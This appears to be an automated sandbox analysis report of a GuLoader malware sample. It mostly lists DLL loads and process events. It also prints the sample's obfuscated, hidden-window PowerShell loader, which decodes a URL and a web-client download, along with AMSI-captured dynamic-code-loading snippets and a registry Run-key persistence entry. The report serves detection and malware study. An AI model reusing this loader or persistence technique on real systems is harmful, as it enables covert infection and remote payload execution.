Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.2153152269.00000000073E9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ore.pdbarj source: powershell.exe, 00000006.00000002.2153152269.00000000073E9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2153152269.00000000073E9000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.2162287230.00000000090CD000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2162034809.00000000087C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1974162438.00000267C01B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2146151980.00000000059FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Fingerwork)$GLoBal:UPHhovE = [sySTEm.text.ENcoDinG]::AScii.GEtsTrinG($blIcKeY)$GlObaL:HYPERPYrAmiD=$uPHHOVE.subSTRInG($khalIL,$humDrUmNesS)<#Morgengave Eksplosionsbrand Kraps Fount U
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Vocationally $Cannellonis56 $Handwheel), (Gavstrikkenes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Stockman = [AppDomain]::CurrentDomain.GetAssemblies
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Piasaba)), $Porcelainisenarm).DefineDynamicModule($slagordner, $false).DefineType($Autotypier, $Unconglomerated, [System.MulticastDele
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Fingerwork)$GLoBal:UPHhovE = [sySTEm.text.ENcoDinG]::AScii.GEtsTrinG($blIcKeY)$GlObaL:HYPERPYrAmiD=$uPHHOVE.subSTRInG($khalIL,$humDrUmNesS)<#Morgengave Eksplosionsbrand Kraps Fount U
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Derindad Telefonkdes Kroforvalterens knudshoveds #>;$Overimpressed215='Steroider115';<#Meso Allittereredes Sidelngder Petroleumsovn Markedsfringsomkostning #>;$Omittancesforstrke116=$Beseemingness+$host.UI;function Foreslaa($Tvivlstilfldet){If ($Omittancesforstrke116) {$Photoelectronics++;}$Transformationsprocesser=$Selskabsrevisors+$Tvivlstilfldet.'Length'-$Photoelectronics; for( $Omittance=4;$Omittance -lt $Transformationsprocesser;$Omittance+=5){$Benzanthrone++;$Vandsskader+=$Tvivlstilfldet[$Omittance];$Styreformerne15='Uproblematiske';}$Vandsskader;}function Heraclitean($Shagrag){ & ($Liljekonvals) ($Shagrag);}$Noden=Foreslaa 'CuprMTorpoStigzSc tiUninlS orlCarbaSkul/Lige ';$Noden+=Foreslaa 'Intr5 od.Slip0Poli Omf( Ed WBairiPreinRummd In oRandwHumosKjru FemaN recT Sta Ste1 Cab0Jux .Ixo 0 For;Sind TalaWGorbiVaesnHem 6.tvk4Afst; v.d SattxSt.b6Kabo4p.lk; Pet Visur etev Udh:Khed1Agit3Brig1Else. Lai0Edul)Deli spirGSlage rocLandkDemooW ys/ .ri2Di k0 .en1,ijo0Rest0Auto1Enla0Id.o1S am BosFAfskiMarkrP omeF ihf teo,entxRobo/U es1Sand3Trav1 Cou.Indl0a em ';$Deglutitive=Foreslaa 'MotiuSne,SHjesE An.RBou - RedaOto G K tE chenN nsTOxgo ';$Spisekortet=Foreslaa 'Glach P.itSubstMod.pDogg:Tiec/ I.t/ConnaHererFesttu.viiansaeFa nr diriCi r.cl.nrDecaohypn/At ogSfol/TessSPersk R,liEksifSko f gale.uchrNor d ErnkTy ek Un eBor re itsSprj.NunnpObstcEngrx.jla ';$Allineate=Foreslaa 'Fila>F.ru ';$Liljekonvals=Foreslaa '.amuIBisaePo.kxCor ';$Brneormens='Sybaritternes';$Omittanceronsided='\Rgnes.Und';Heraclitean (Foreslaa 'Forb$Ko,fgShorLUnifOEpigBC moASaprlOmf :kautFPromOU gyZPoutIForfnSu,pe AddSLunesKins=Co.e$ Lu,eQuesNSvnlVDell:UnscanonvPRingpDisuDkakiA omaTEquiAThys+Komp$ oodoSn wmU piiNoonTAwarTMag ABearnzibeCFortEUndeRKil o O,enYppesSystiAftedFarieDiopdMukk ');Heraclitean (Foreslaa 'or a$SvorG L,vLCe.tOko,mbSolba HypLOut,:WaremWearA P arU,vojBenfU So,Nfor Sanop= Cos$ConuSH.ftPFan I IsosRochELat k chaOUncorOmk,tCherelierTNe.p.Es asOrieP StrLS vsiLocutAfgi( Min$AkkuaG nzl CollPhalI BdeN higeS ngA ArmtIliaeTric) Sta ');Heraclitean (Foreslaa 'Pane[EscoNMythEDrysTHelt.scotS nhETovbrPladvRdbrICentCAfb EVas p ynaOO.tbIBedsnParat VapM orkaForbnMarmapenngHoppeShirrHals].nal:Leve:,uttSHov elovmcDisbU ,arRErriIEschTU bryDelkp AntRTeosOTunntKulkO NolCUdhooRendlPe.s Prey=Data U,or[ uleN ukeToldT Gez.Af,aSKl,keConscFormuNe tRManuIGysetspiryPrevPc.arrunr,OStamtCe loPhasCStamoD sil NomtaqqaY F lpschiE Ufo]Fend:E.cy:Rstetw nwlOmk sBerr1For,2Siti ');$Spisekortet=$marjuns[0];$Resident=(Foreslaa 'Para$Carag,verl FebOForebSe mAbattLRveh: ordoGoosVW geE EverEupssSu cp Ad rprofiG,lenI nkGHyraE,kerLskn.SCandEs bcRDe h=Fljenu.trE ExeWNon.-B skoBarnbTrskjWoodeOptrcUtydT Pre UncsWresY SansStertH,tteArmomPost. ditnNitrET.avto pa. Sumw D mEZealb ealcSuboLUntwiPerie PrenIntetTh e ');Heraclitean ($Resident);Heraclitean (Foreslaa 'Hand$klagOPecuvDyste HalrSt,msMundps,ntr ReniV ounTria
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Derindad Telefonkdes Kroforvalterens knudshoveds #>;$Overimpressed215='Steroider115';<#Meso Allittereredes Sidelngder Petroleumsovn Markedsfringsomkostning #>;$Omittancesforstrke116=$Beseemingness+$host.UI;function Foreslaa($Tvivlstilfldet){If ($Omittancesforstrke116) {$Photoelectronics++;}$Transformationsprocesser=$Selskabsrevisors+$Tvivlstilfldet.'Length'-$Photoelectronics; for( $Omittance=4;$Omittance -lt $Transformationsprocesser;$Omittance+=5){$Benzanthrone++;$Vandsskader+=$Tvivlstilfldet[$Omittance];$Styreformerne15='Uproblematiske';}$Vandsskader;}function Heraclitean($Shagrag){ & ($Liljekonvals) ($Shagrag);}$Noden=Foreslaa 'CuprMTorpoStigzSc tiUninlS orlCarbaSkul/Lige ';$Noden+=Foreslaa 'Intr5 od.Slip0Poli Omf( Ed WBairiPreinRummd In oRandwHumosKjru FemaN recT Sta Ste1 Cab0Jux .Ixo 0 For;Sind TalaWGorbiVaesnHem 6.tvk4Afst; v.d SattxSt.b6Kabo4p.lk; Pet Visur etev Udh:Khed1Agit3Brig1Else. Lai0Edul)Deli spirGSlage rocLandkDemooW ys/ .ri2Di k0 .en1,ijo0Rest0Auto1Enla0Id.o1S am BosFAfskiMarkrP omeF ihf teo,entxRobo/U es1Sand3Trav1 Cou.Indl0a em ';$Deglutitive=Foreslaa 'MotiuSne,SHjesE An.RBou - RedaOto G K tE chenN nsTOxgo ';$Spisekortet=Foreslaa 'Glach P.itSubstMod.pDogg:Tiec/ I.t/ConnaHererFesttu.viiansaeFa nr diriCi r.cl.nrDecaohypn/At ogSfol/TessSPersk R,liEksifSko f gale.uchrNor d ErnkTy ek Un eBor re itsSprj.NunnpObstcEngrx.jla ';$Allineate=Foreslaa 'Fila>F.ru ';$Liljekonvals=Foreslaa '.amuIBisaePo.kxCor ';$Brneormens='Sybaritternes';$Omittanceronsided='\Rgnes.Und';Heraclitean (Foreslaa 'Forb$Ko,fgShorLUnifOEpigBC moASaprlOmf :kautFPromOU gyZPoutIForfnSu,pe AddSLunesKins=Co.e$ Lu,eQuesNSvnlVDell:UnscanonvPRingpDisuDkakiA omaTEquiAThys+Komp$ oodoSn wmU piiNoonTAwarTMag ABearnzibeCFortEUndeRKil o O,enYppesSystiAftedFarieDiopdMukk ');Heraclitean (Foreslaa 'or a$SvorG L,vLCe.tOko,mbSolba HypLOut,:WaremWearA P arU,vojBenfU So,Nfor Sanop= Cos$ConuSH.ftPFan I IsosRochELat k chaOUncorOmk,tCherelierTNe.p.Es asOrieP StrLS vsiLocutAfgi( Min$AkkuaG nzl CollPhalI BdeN higeS ngA ArmtIliaeTric) Sta ');Heraclitean (Foreslaa 'Pane[EscoNMythEDrysTHelt.scotS nhETovbrPladvRdbrICentCAfb EVas p ynaOO.tbIBedsnParat VapM orkaForbnMarmapenngHoppeShirrHals].nal:Leve:,uttSHov elovmcDisbU ,arRErriIEschTU bryDelkp AntRTeosOTunntKulkO NolCUdhooRendlPe.s Prey=Data U,or[ uleN ukeToldT Gez.Af,aSKl,keConscFormuNe tRManuIGysetspiryPrevPc.arrunr,OStamtCe loPhasCStamoD sil NomtaqqaY F lpschiE Ufo]Fend:E.cy:Rstetw nwlOmk sBerr1For,2Siti ');$Spisekortet=$marjuns[0];$Resident=(Foreslaa 'Para$Carag,verl FebOForebSe mAbattLRveh: ordoGoosVW geE EverEupssSu cp Ad rprofiG,lenI nkGHyraE,kerLskn.SCandEs bcRDe h=Fljenu.trE ExeWNon.-B skoBarnbTrskjWoodeOptrcUtydT Pre UncsWresY SansStertH,tteArmomPost. ditnNitrET.avto pa. Sumw D mEZealb ealcSuboLUntwiPerie PrenIntetTh e ');Heraclitean ($Resident);Heraclitean (Foreslaa 'Hand$klagOPecuvDyste HalrSt,ms
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Derindad Telefonkdes Kroforvalterens knudshoveds #>;$Overimpressed215='Steroider115';<#Meso Allittereredes Sidelngder Petroleumsovn Markedsfringsomkostning #>;$Omittancesforstrke116=$Beseemingness+$host.UI;function Foreslaa($Tvivlstilfldet){If ($Omittancesforstrke116) {$Photoelectronics++;}$Transformationsprocesser=$Selskabsrevisors+$Tvivlstilfldet.'Length'-$Photoelectronics; for( $Omittance=4;$Omittance -lt $Transformationsprocesser;$Omittance+=5){$Benzanthrone++;$Vandsskader+=$Tvivlstilfldet[$Omittance];$Styreformerne15='Uproblematiske';}$Vandsskader;}function Heraclitean($Shagrag){ & ($Liljekonvals) ($Shagrag);}$Noden=Foreslaa 'CuprMTorpoStigzSc tiUninlS orlCarbaSkul/Lige ';$Noden+=Foreslaa 'Intr5 od.Slip0Poli Omf( Ed WBairiPreinRummd In oRandwHumosKjru FemaN recT Sta Ste1 Cab0Jux .Ixo 0 For;Sind TalaWGorbiVaesnHem 6.tvk4Afst; v.d SattxSt.b6Kabo4p.lk; Pet Visur etev Udh:Khed1Agit3Brig1Else. Lai0Edul)Deli spirGSlage rocLandkDemooW ys/ .ri2Di k0 .en1,ijo0Rest0Auto1Enla0Id.o1S am BosFAfskiMarkrP omeF ihf teo,entxRobo/U es1Sand3Trav1 Cou.Indl0a em ';$Deglutitive=Foreslaa 'MotiuSne,SHjesE An.RBou - RedaOto G K tE chenN nsTOxgo ';$Spisekortet=Foreslaa 'Glach P.itSubstMod.pDogg:Tiec/ I.t/ConnaHererFesttu.viiansaeFa nr diriCi r.cl.nrDecaohypn/At ogSfol/TessSPersk R,liEksifSko f gale.uchrNor d ErnkTy ek Un eBor re itsSprj.NunnpObstcEngrx.jla ';$Allineate=Foreslaa 'Fila>F.ru ';$Liljekonvals=Foreslaa '.amuIBisaePo.kxCor ';$Brneormens='Sybaritternes';$Omittanceronsided='\Rgnes.Und';Heraclitean (Foreslaa 'Forb$Ko,fgShorLUnifOEpigBC moASaprlOmf :kautFPromOU gyZPoutIForfnSu,pe AddSLunesKins=Co.e$ Lu,eQuesNSvnlVDell:UnscanonvPRingpDisuDkakiA omaTEquiAThys+Komp$ oodoSn wmU piiNoonTAwarTMag ABearnzibeCFortEUndeRKil o O,enYppesSystiAftedFarieDiopdMukk ');Heraclitean (Foreslaa 'or a$SvorG L,vLCe.tOko,mbSolba HypLOut,:WaremWearA P arU,vojBenfU So,Nfor Sanop= Cos$ConuSH.ftPFan I IsosRochELat k chaOUncorOmk,tCherelierTNe.p.Es asOrieP StrLS vsiLocutAfgi( Min$AkkuaG nzl CollPhalI BdeN higeS ngA ArmtIliaeTric) Sta ');Heraclitean (Foreslaa 'Pane[EscoNMythEDrysTHelt.scotS nhETovbrPladvRdbrICentCAfb EVas p ynaOO.tbIBedsnParat VapM orkaForbnMarmapenngHoppeShirrHals].nal:Leve:,uttSHov elovmcDisbU ,arRErriIEschTU bryDelkp AntRTeosOTunntKulkO NolCUdhooRendlPe.s Prey=Data U,or[ uleN ukeToldT Gez.Af,aSKl,keConscFormuNe tRManuIGysetspiryPrevPc.arrunr,OStamtCe loPhasCStamoD sil NomtaqqaY F lpschiE Ufo]Fend:E.cy:Rstetw nwlOmk sBerr1For,2Siti ');$Spisekortet=$marjuns[0];$Resident=(Foreslaa 'Para$Carag,verl FebOForebSe mAbattLRveh: ordoGoosVW geE EverEupssSu cp Ad rprofiG,lenI nkGHyraE,kerLskn.SCandEs bcRDe h=Fljenu.trE ExeWNon.-B skoBarnbTrskjWoodeOptrcUtydT Pre UncsWresY SansStertH,tteArmomPost. ditnNitrET.avto pa. Sumw D mEZealb ealcSuboLUntwiPerie PrenIntetTh e ');Heraclitean ($Resident);Heraclitean (Foreslaa 'Hand$klagOPecuvDyste HalrSt,msMundps,ntr ReniV ounTria Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 13_2_004044A4
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B6F00AD pushad ; iretd 2_2_00007FFD9B6F00C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0488371F push eax; iretd 6_2_04883759
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_21F52806 push ecx; ret 9_2_21F52819
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_21F61219 push esp; iretd 9_2_21F6121A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044693D push ecx; ret 13_2_0044694D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044DB70 push eax; ret 13_2_0044DB84
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044DB70 push eax; ret 13_2_0044DBAC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00451D54 push eax; ret 13_2_00451D61
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044B090 push eax; ret 15_2_0044B0A4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044B090 push eax; ret 15_2_0044B0CC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00444E71 push ecx; ret 15_2_00444E81
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00414060 push eax; ret 16_2_00414074
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00414060 push eax; ret 16_2_0041409C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00414039 push ecx; ret 16_2_00414049
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_004164EB push 0000006Ah; retf 16_2_004165C4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00416553 push 0000006Ah; retf 16_2_004165C4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00416555 push 0000006Ah; retf 16_2_004165C4
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Hvidtning81 Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Hvidtning81 Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 15_2_004047CB
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
